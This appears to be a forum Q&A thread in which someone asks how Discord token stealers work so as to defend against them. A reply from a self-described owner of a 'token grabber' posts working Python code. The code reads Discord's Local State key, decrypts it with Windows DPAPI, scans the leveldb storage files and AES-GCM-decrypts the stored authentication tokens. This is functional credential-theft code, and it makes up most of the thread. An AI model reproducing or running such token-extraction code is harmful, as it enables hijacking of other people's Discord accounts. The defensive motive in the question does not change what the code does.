I'm making a program to prevent discord token theft. And I have a question, how do all these viruses get the discord token from the discord application? What files do they download it from and how do they decrypt it? Because I'm writing a program to prevent this and I have to write such an algorithm. I'm doing this in c# .NET 4.7.2.
I tried searching on Google and GitHub but I didn't find anything.
I have a token grabber, and it accesses:
\AppData\Roaming\discord\Local Storage\leveldb
Hope this helps.
The code, which is in python, is:
def get_token():
encPattern = r'dQw4w9WgXcQ:[^\"]*'
dbPath = os.path.normpath(r"%s\AppData\Roaming\discord\Local Storage\leveldb"%(os.environ['USERPROFILE']))
statePath = os.path.normpath(r"%s\AppData\Roaming\discord\Local State" % (os.environ['USERPROFILE']))
with open(statePath, 'r') as f:
state = f.read()
state = json.loads(state)
master_key = base64.b64decode(state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
for file_name in os.listdir(dbPath):
if file_name[-3:] not in ["log", "ldb"]:
continue
for line in [x.strip() for x in open(f'{dbPath}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for y in re.findall(encPattern, line):
enc_token = base64.b64decode(y.split('dQw4w9WgXcQ:')[1])
iv = enc_token[3:15]
payload = enc_token[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decr_token = cipher.decrypt(payload)
decr_token = decr_token[:-16].decode()
if check_token(decr_token):
return decr_token